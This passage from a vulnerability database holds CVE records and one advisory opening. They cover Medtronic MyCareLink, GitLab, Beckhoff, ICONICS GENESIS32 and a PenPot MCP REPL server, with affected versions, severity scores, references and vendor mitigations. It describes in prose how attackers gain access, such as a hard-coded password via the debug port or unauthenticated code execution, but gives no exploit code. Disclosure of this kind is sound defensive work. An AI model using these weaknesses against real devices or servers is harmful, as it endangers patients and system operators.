              "value": "\u003cp\u003eMedtronic recommends users take additional defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\u003c/p\u003e\u003cul\u003e\u003cli\u003eMaintain good physical controls over the home monitor as the best mitigation to these vulnerabilities. \u0026nbsp;\u003c/li\u003e\u003cli\u003eOnly use home monitors obtained directly from their healthcare provider or a Medtronic representative to ensure integrity of the system. \u003c/li\u003e\u003cli\u003eReport any concerning behavior regarding their home monitor to their healthcare provider or a Medtronic representative. \u003c/li\u003e\u003c/ul\u003e\u003cp\u003eMedtronic has released additional patient focused information, at the following location:\u003c/p\u003e\u003cp\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://www.medtronic.com/security\"\u003ehttps://www.medtronic.com/security\u003c/a\u003e\u003c/p\u003e\n\n\u003cbr\u003e"
            }
          ],
          "value": "Medtronic recommends users take additional defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n  *  Maintain good physical controls over the home monitor as the best mitigation to these vulnerabilities. \u00a0\n  *  Only use home monitors obtained directly from their healthcare provider or a Medtronic representative to ensure integrity of the system. \n  *  Report any concerning behavior regarding their home monitor to their healthcare provider or a Medtronic representative. \n\n\nMedtronic has released additional patient focused information, at the following location:\n\n https://www.medtronic.com/security"
        }
      ],
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "ics-cert@hq.dhs.gov",
          "DATE_PUBLIC": "2018-06-29T00:00:00",
          "ID": "CVE-2018-8870",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Medtronic MyCareLink Patient Monitor",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "24950 MyCareLink Monitor, all versions, 24952 MyCareLink Monitor, all versions."
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "ICS-CERT"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Medtronic MyCareLink Patient Monitor, 24950 MyCareLink Monitor, all versions, and 24952 MyCareLink Monitor, all versions contains a hard-coded operating system password. An attacker with physical access can remove the case of the device, connect to the debug port, and use the password to gain privileged access to the operating system."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "USE OF HARD-CODED PASSWORD CWE-259"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-179-01",
              "refsource": "MISC",
              "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-179-01"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
    "assignerShortName": "icscert",
    "cveId": "CVE-2018-8868",
    "datePublished": "2018-07-02T18:00:00.000Z",
    "dateReserved": "2018-03-20T00:00:00.000Z",
    "dateUpdated": "2025-05-22T18:14:07.710Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2016-9469 (GCVE-0-2016-9469)

Vulnerability from cvelistv5 – Published: 2017-03-28 02:46 – Updated: 2024-08-06 02:50
VLAI
Summary
Multiple versions of GitLab expose a dangerous method to any authenticated user that could lead to the deletion of all Issue and MergeRequest objects on a GitLab instance. For GitLab instances with publicly available projects this vulnerability could be exploited by an unauthenticated user. A fix was included in versions 8.14.3, 8.13.8, and 8.12.11, which were released on December 5th 2016 at 3:59 PST. The GitLab versions vulnerable to this are 8.13.0, 8.13.0-ee, 8.13.1, 8.13.1-ee, 8.13.2, 8.13.2-ee, 8.13.3, 8.13.3-ee, 8.13.4, 8.13.4-ee, 8.13.5, 8.13.5-ee, 8.13.6, 8.13.6-ee, 8.13.7, 8.14.0, 8.14.0-ee, 8.14.1, 8.14.2, and 8.14.2-ee.
Severity
No CVSS data available.
CWE
  • CWE-749 - Exposed Dangerous Method or Function (CWE-749)
Assigner
Impacted products
Vendor Product Version
n/a GitLab Community Edition & GitLab Enterprise Edition 8.13.0, 8.13.0-ee, 8.13.1, 8.13.1-ee, 8.13.2, 8.13.2-ee, 8.13.3, 8.13.3-ee, 8.13.4, 8.13.4-ee, 8.13.5, 8.13.5-ee, 8.13.6, 8.13.6-ee, 8.13.7, 8.14.0, 8.14.0-ee, 8.14.1 Affected: GitLab Community Edition & GitLab Enterprise Edition 8.13.0, 8.13.0-ee, 8.13.1, 8.13.1-ee, 8.13.2, 8.13.2-ee, 8.13.3, 8.13.3-ee, 8.13.4, 8.13.4-ee, 8.13.5, 8.13.5-ee, 8.13.6, 8.13.6-ee, 8.13.7, 8.14.0, 8.14.0-ee, 8.14.1
Date Public
2017-03-27 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T02:50:38.683Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://gitlab.com/gitlab-org/gitlab-ce/commit/f325e4e734e5e486f3b02db176eb629124052b43"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://gitlab.com/gitlab-org/gitlab-ce/commit/55196497301eea429913f9c4b1b37c42c2e358ce"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://about.gitlab.com/2016/12/05/cve-2016-9469/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://hackerone.com/reports/186194"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://gitlab.com/gitlab-org/gitlab-ce/issues/25064"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://gitlab.com/gitlab-org/gitlab-ce/commit/29ceb98b5162677601702704e89d845580372078"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "GitLab Community Edition \u0026 GitLab Enterprise Edition 8.13.0, 8.13.0-ee, 8.13.1, 8.13.1-ee, 8.13.2, 8.13.2-ee, 8.13.3, 8.13.3-ee, 8.13.4, 8.13.4-ee, 8.13.5, 8.13.5-ee, 8.13.6, 8.13.6-ee, 8.13.7, 8.14.0, 8.14.0-ee, 8.14.1",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "GitLab Community Edition \u0026 GitLab Enterprise Edition 8.13.0, 8.13.0-ee, 8.13.1, 8.13.1-ee, 8.13.2, 8.13.2-ee, 8.13.3, 8.13.3-ee, 8.13.4, 8.13.4-ee, 8.13.5, 8.13.5-ee, 8.13.6, 8.13.6-ee, 8.13.7, 8.14.0, 8.14.0-ee, 8.14.1"
            }
          ]
        }
      ],
      "datePublic": "2017-03-27T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple versions of GitLab expose a dangerous method to any authenticated user that could lead to the deletion of all Issue and MergeRequest objects on a GitLab instance. For GitLab instances with publicly available projects this vulnerability could be exploited by an unauthenticated user. A fix was included in versions 8.14.3, 8.13.8, and 8.12.11, which were released on December 5th 2016 at 3:59 PST. The GitLab versions vulnerable to this are 8.13.0, 8.13.0-ee, 8.13.1, 8.13.1-ee, 8.13.2, 8.13.2-ee, 8.13.3, 8.13.3-ee, 8.13.4, 8.13.4-ee, 8.13.5, 8.13.5-ee, 8.13.6, 8.13.6-ee, 8.13.7, 8.14.0, 8.14.0-ee, 8.14.1, 8.14.2, and 8.14.2-ee."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-749",
              "description": "Exposed Dangerous Method or Function (CWE-749)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-03-28T02:57:01.000Z",
        "orgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1",
        "shortName": "hackerone"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://gitlab.com/gitlab-org/gitlab-ce/commit/f325e4e734e5e486f3b02db176eb629124052b43"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://gitlab.com/gitlab-org/gitlab-ce/commit/55196497301eea429913f9c4b1b37c42c2e358ce"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://about.gitlab.com/2016/12/05/cve-2016-9469/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://hackerone.com/reports/186194"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://gitlab.com/gitlab-org/gitlab-ce/issues/25064"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://gitlab.com/gitlab-org/gitlab-ce/commit/29ceb98b5162677601702704e89d845580372078"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "support@hackerone.com",
          "ID": "CVE-2016-9469",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "GitLab Community Edition \u0026 GitLab Enterprise Edition 8.13.0, 8.13.0-ee, 8.13.1, 8.13.1-ee, 8.13.2, 8.13.2-ee, 8.13.3, 8.13.3-ee, 8.13.4, 8.13.4-ee, 8.13.5, 8.13.5-ee, 8.13.6, 8.13.6-ee, 8.13.7, 8.14.0, 8.14.0-ee, 8.14.1",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "GitLab Community Edition \u0026 GitLab Enterprise Edition 8.13.0, 8.13.0-ee, 8.13.1, 8.13.1-ee, 8.13.2, 8.13.2-ee, 8.13.3, 8.13.3-ee, 8.13.4, 8.13.4-ee, 8.13.5, 8.13.5-ee, 8.13.6, 8.13.6-ee, 8.13.7, 8.14.0, 8.14.0-ee, 8.14.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple versions of GitLab expose a dangerous method to any authenticated user that could lead to the deletion of all Issue and MergeRequest objects on a GitLab instance. For GitLab instances with publicly available projects this vulnerability could be exploited by an unauthenticated user. A fix was included in versions 8.14.3, 8.13.8, and 8.12.11, which were released on December 5th 2016 at 3:59 PST. The GitLab versions vulnerable to this are 8.13.0, 8.13.0-ee, 8.13.1, 8.13.1-ee, 8.13.2, 8.13.2-ee, 8.13.3, 8.13.3-ee, 8.13.4, 8.13.4-ee, 8.13.5, 8.13.5-ee, 8.13.6, 8.13.6-ee, 8.13.7, 8.14.0, 8.14.0-ee, 8.14.1, 8.14.2, and 8.14.2-ee."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Exposed Dangerous Method or Function (CWE-749)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://gitlab.com/gitlab-org/gitlab-ce/commit/f325e4e734e5e486f3b02db176eb629124052b43",
              "refsource": "MISC",
              "url": "https://gitlab.com/gitlab-org/gitlab-ce/commit/f325e4e734e5e486f3b02db176eb629124052b43"
            },
            {
              "name": "https://gitlab.com/gitlab-org/gitlab-ce/commit/55196497301eea429913f9c4b1b37c42c2e358ce",
              "refsource": "MISC",
              "url": "https://gitlab.com/gitlab-org/gitlab-ce/commit/55196497301eea429913f9c4b1b37c42c2e358ce"
            },
            {
              "name": "https://about.gitlab.com/2016/12/05/cve-2016-9469/",
              "refsource": "MISC",
              "url": "https://about.gitlab.com/2016/12/05/cve-2016-9469/"
            },
            {
              "name": "https://hackerone.com/reports/186194",
              "refsource": "MISC",
              "url": "https://hackerone.com/reports/186194"
            },
            {
              "name": "https://gitlab.com/gitlab-org/gitlab-ce/issues/25064",
              "refsource": "MISC",
              "url": "https://gitlab.com/gitlab-org/gitlab-ce/issues/25064"
            },
            {
              "name": "https://gitlab.com/gitlab-org/gitlab-ce/commit/29ceb98b5162677601702704e89d845580372078",
              "refsource": "MISC",
              "url": "https://gitlab.com/gitlab-org/gitlab-ce/commit/29ceb98b5162677601702704e89d845580372078"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1",
    "assignerShortName": "hackerone",
    "cveId": "CVE-2016-9469",
    "datePublished": "2017-03-28T02:46:00.000Z",
    "dateReserved": "2016-11-19T00:00:00.000Z",
    "dateUpdated": "2024-08-06T02:50:38.683Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2014-5415 (GCVE-0-2014-5415)

Vulnerability from cvelistv5 – Published: 2016-10-05 10:00 – Updated: 2025-11-04 23:12
VLAI
Title
Beckhoff Embedded PC Images and TwinCAT Components Exposed Dangerous Method or Function
Summary
Beckhoff Embedded PC images before 2014-10-22 and Automation Device Specification (ADS) TwinCAT components might allow remote attackers to obtain access via the (1) Windows CE Remote Configuration Tool, (2) CE Remote Display service, or (3) TELNET service.
CWE
Assigner
Date Public
2016-10-04 06:00
Credits
Gregor Bonney from FH Aachen University of Applied Sciences
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T11:41:49.234Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "93349",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/93349"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-278-02"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Embedded PC Images",
          "vendor": "Beckhoff",
          "versions": [
            {
              "lessThan": "October 22, 2014",
              "status": "affected",
              "version": "0",
              "versionType": "custom"
            }
          ]
        },
        {
          "defaultStatus": "unaffected",
          "product": "TwinCAT Components featuring Automation Device Specification (ADS) communication",
          "vendor": "Beckhoff",
          "versions": [
            {
              "status": "affected",
              "version": "All"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Gregor Bonney from FH Aachen University of Applied Sciences"
        }
      ],
      "datePublic": "2016-10-04T06:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003e\nBeckhoff Embedded PC images before 2014-10-22 and Automation Device Specification (ADS) TwinCAT components might allow remote attackers to obtain access via the (1) Windows CE Remote Configuration Tool, (2) CE Remote Display service, or (3) TELNET service.\n\n\u003c/p\u003e"
            }
          ],
          "value": "Beckhoff Embedded PC images before 2014-10-22 and Automation Device Specification (ADS) TwinCAT components might allow remote attackers to obtain access via the (1) Windows CE Remote Configuration Tool, (2) CE Remote Display service, or (3) TELNET service."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-749",
              "description": "CWE-749",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-11-04T23:12:23.266Z",
        "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
        "shortName": "icscert"
      },
      "references": [
        {
          "name": "93349",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/93349"
        },
        {
          "url": "https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2014-001.pdf"
        },
        {
          "url": "https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2014-002.pdf"
        },
        {
          "url": "https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2014-003.pdf"
        },
        {
          "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-16-278-02"
        },
        {
          "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2016/icsa-16-278-02.json"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eBeckhoff recommends in their IPC Security Manual \n(\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://download.beckhoff.com/download/Document/ipc/industrial-pc/ipc_security_en.pdf\"\u003ehttps://download.beckhoff.com/download/Document/ipc/industrial-pc/ipc_security_en.pdf\u003c/a\u003e)\n to use network and software firewalls to block all network ports except\n the ones that are needed. Beckhoff also recommends that default \npasswords be changed during commissioning before connecting systems to \nthe network.\u003c/p\u003e\n\u003cp\u003eIn their advisories (Advisory 2014-001: Potential \nmisuse of several administrative services, \n\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2014-001.pdf\"\u003ehttps://download.beckhoff.com/download/document/product-security/Advisories/advisory-2014-001.pdf\u003c/a\u003e. Advisory 2014-002: ADS communication port allows password bruteforce, \n\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2014-002.pdf\"\u003ehttps://download.beckhoff.com/download/document/product-security/Advisories/advisory-2014-002.pdf\u003c/a\u003e. Advisory2014-003: Recommendation to change default passwords, \n\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2014-003.pdf\"\u003ehttps://download.beckhoff.com/download/document/product-security/Advisories/advisory-2014-003.pdf\u003c/a\u003e\u0026nbsp;which were published November \n17, 2014) for these issues, Beckhoff also recommends the following \nmitigation solutions:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate images to build October 22, 2014, or newer, which solve these problems by disabling the services by default.\u003c/li\u003e\n\u003cli\u003eDisable the Windows CE Remote Configuration Tool by deleting the \nsubtree \u201c/remoteadmin.\u201d The configuration of the web server paths can be\n found in the Windows registry at the path \n\u201cHKEY_LOCAL_MACHINE\\COMM\\HTTPD\\VROOTS\\.\u201d\u003c/li\u003e\n\u003cli\u003eDisable startup of CE Remote Display service (cerdisp.exe) with \ndeleting the registry key containing the \u201cCeRDisp.exe\u201d \n[-HKEY_LOCAL_MACHINE\\init\\Launch90].\u003c/li\u003e\n\u003cli\u003eDisable telnet by setting the registry key [HKEY_LOCAL_MACHINE\\Services\\TELNETD\\Flags] to dword: 4\u003c/li\u003e\n\u003cli\u003eRestrict ADS communication to trusted networks only.\u003c/li\u003e\n\u003c/ul\u003e\n\n\u003cbr\u003e"
            }
          ],
          "value": "Beckhoff recommends in their IPC Security Manual \n( https://download.beckhoff.com/download/Document/ipc/industrial-pc/ipc_security_en.pdf )\n to use network and software firewalls to block all network ports except\n the ones that are needed. Beckhoff also recommends that default \npasswords be changed during commissioning before connecting systems to \nthe network.\n\n\nIn their advisories (Advisory 2014-001: Potential \nmisuse of several administrative services, \n https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2014-001.pdf . Advisory 2014-002: ADS communication port allows password bruteforce, \n https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2014-002.pdf . Advisory2014-003: Recommendation to change default passwords, \n https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2014-003.pdf \u00a0which were published November \n17, 2014) for these issues, Beckhoff also recommends the following \nmitigation solutions:\n\n\n\n  *  Update images to build October 22, 2014, or newer, which solve these problems by disabling the services by default.\n\n  *  Disable the Windows CE Remote Configuration Tool by deleting the \nsubtree \u201c/remoteadmin.\u201d The configuration of the web server paths can be\n found in the Windows registry at the path \n\u201cHKEY_LOCAL_MACHINE\\COMM\\HTTPD\\VROOTS\\.\u201d\n\n  *  Disable startup of CE Remote Display service (cerdisp.exe) with \ndeleting the registry key containing the \u201cCeRDisp.exe\u201d \n[-HKEY_LOCAL_MACHINE\\init\\Launch90].\n\n  *  Disable telnet by setting the registry key [HKEY_LOCAL_MACHINE\\Services\\TELNETD\\Flags] to dword: 4\n\n  *  Restrict ADS communication to trusted networks only."
        }
      ],
      "source": {
        "advisory": "ICSA-16-278-02",
        "discovery": "EXTERNAL"
      },
      "title": "Beckhoff Embedded PC Images and TwinCAT Components Exposed Dangerous Method or Function",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "ics-cert@hq.dhs.gov",
          "ID": "CVE-2014-5414",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Beckhoff Embedded PC images before 2014-10-22 and Automation Device Specification (ADS) TwinCAT components do not restrict the number of authentication attempts, which makes it easier for remote attackers to obtain access via a brute-force attack."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "93349",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/93349"
            },
            {
              "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-278-02",
              "refsource": "MISC",
              "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-278-02"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
    "assignerShortName": "icscert",
    "cveId": "CVE-2014-5415",
    "datePublished": "2016-10-05T10:00:00.000Z",
    "dateReserved": "2014-08-22T00:00:00.000Z",
    "dateUpdated": "2025-11-04T23:12:23.266Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2014-0758 (GCVE-0-2014-0758)

Vulnerability from cvelistv5 – Published: 2014-02-24 02:00 – Updated: 2025-08-22 23:00
VLAI
Title
ICONICS GENESIS32 Exposed Dangerous Method or Function
Summary
An ActiveX control in GenLaunch.htm in ICONICS GENESIS32 8.0, 8.02, 8.04, and 8.05 allows remote attackers to execute arbitrary programs via a crafted HTML document.
Severity
No CVSS data available.
CWE
Assigner
Impacted products
Vendor Product Version
ICONICS GENESIS32 Affected: 8.0
Affected: 8.02
Affected: 8.04
Affected: 8.05
Create a notification for this product.
Date Public
2014-02-20 07:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T09:27:19.520Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://ics-cert.us-cert.gov/advisories/ICSA-14-051-01"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "GENESIS32",
          "vendor": "ICONICS",
          "versions": [
            {
              "status": "affected",
              "version": "8.0"
            },
            {
              "status": "affected",
              "version": "8.02"
            },
            {
              "status": "affected",
              "version": "8.04"
            },
            {
              "status": "affected",
              "version": "8.05"
            }
          ]
        }
      ],
      "datePublic": "2014-02-20T07:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eAn ActiveX control in GenLaunch.htm in ICONICS GENESIS32 8.0, 8.02, 8.04, and 8.05 allows remote attackers to execute arbitrary programs via a crafted HTML document.\u003c/p\u003e"
            }
          ],
          "value": "An ActiveX control in GenLaunch.htm in ICONICS GENESIS32 8.0, 8.02, 8.04, and 8.05 allows remote attackers to execute arbitrary programs via a crafted HTML document."
        }
      ],
      "metrics": [
        {
          "cvssV2_0": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.3,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-749",
              "description": "CWE-749",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-08-22T23:00:45.832Z",
        "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
        "shortName": "icscert"
      },
      "references": [
        {
          "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-14-051-01"
        }
      ],
      "source": {
        "advisory": "ICSA-14-051-01",
        "discovery": "UNKNOWN"
      },
      "title": "ICONICS GENESIS32 Exposed Dangerous Method or Function",
      "workarounds": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "ICONICS provides information and useful links related to its security patches at its web site at \u003ca target=\"_blank\" rel=\"nofollow\" href=\"http://www.iconics.com/certs\"\u003ehttp://www.iconics.com/certs\u003c/a\u003e\u0026nbsp;.\u003cp\u003eICONICS also recommends users of GENESIS32 V8 systems take the following mitigation steps:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUse a firewall, place control system networks and devices behind firewalls and isolate them from the business network.\u003c/li\u003e\n\u003cli\u003eDo not click web links or open unsolicited attachments in e-mail messages.\u003c/li\u003e\n\u003cli\u003eInstall the patch.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe ICONICS web site also provides a downloadable whitepaper on\u0026nbsp; security vulnerabilities (registration required for download). The whitepaper on security vulnerabilities contains overview, details and \nmitigation plan for regarding buffer overflow and memory corruption \nvulnerabilities for ICONICS GENESIS32 and GENESIS64 supervisory control \nand data acquisition (SCADA) products.\u003c/p\u003e\n\n\u003cbr\u003e"
            }
          ],
          "value": "ICONICS provides information and useful links related to its security patches at its web site at  http://www.iconics.com/certs \u00a0.ICONICS also recommends users of GENESIS32 V8 systems take the following mitigation steps:\n\n\n\n  *  Use a firewall, place control system networks and devices behind firewalls and isolate them from the business network.\n\n  *  Do not click web links or open unsolicited attachments in e-mail messages.\n\n  *  Install the patch.\n\n\n\n\nThe ICONICS web site also provides a downloadable whitepaper on\u00a0 security vulnerabilities (registration required for download). The whitepaper on security vulnerabilities contains overview, details and \nmitigation plan for regarding buffer overflow and memory corruption \nvulnerabilities for ICONICS GENESIS32 and GENESIS64 supervisory control \nand data acquisition (SCADA) products."
        }
      ],
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "ics-cert@hq.dhs.gov",
          "ID": "CVE-2014-0758",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An ActiveX control in GenLaunch.htm in ICONICS GENESIS32 8.0, 8.02, 8.04, and 8.05 allows remote attackers to execute arbitrary programs via a crafted HTML document."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://ics-cert.us-cert.gov/advisories/ICSA-14-051-01",
              "refsource": "MISC",
              "url": "http://ics-cert.us-cert.gov/advisories/ICSA-14-051-01"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
    "assignerShortName": "icscert",
    "cveId": "CVE-2014-0758",
    "datePublished": "2014-02-24T02:00:00.000Z",
    "dateReserved": "2014-01-02T00:00:00.000Z",
    "dateUpdated": "2025-08-22T23:00:45.832Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

GHSA-22QR-RP27-J9WM

Vulnerability from github – Published: 2026-05-19 19:57 – Updated: 2026-05-19 19:57
VLAI
Summary
PenPot MCP REPL server binds to 0.0.0.0 with unauthenticated /execute endpoint — RCE
Details

Summary

The MCP module's ReplServer binds to all interfaces (0.0.0.0:4403) and exposes a /execute endpoint that runs arbitrary code with zero authentication. Anyone on the network can POST JavaScript and it runs on the server. The main PenpotMcpServer was partially fixed for a similar binding issue (#8683), but ReplServer.ts was missed.

Details

